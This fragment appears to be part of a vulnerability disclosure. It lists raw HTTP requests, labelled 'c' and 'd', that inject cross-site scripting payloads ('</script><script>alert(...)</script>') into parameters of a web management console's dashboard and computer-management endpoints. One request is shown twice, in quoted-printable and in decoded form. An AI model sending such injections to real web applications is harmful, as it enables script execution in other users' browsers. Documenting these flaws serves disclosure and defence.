c. POST /console/createDashboardContainer.do HTTP/1.1
elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30&
width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo
nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec
urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard
elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30&
width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&mo
nitorUrl=http%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec
urity.token=9BslgbJEv2JqQy3k&ajaxMode=standard
d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1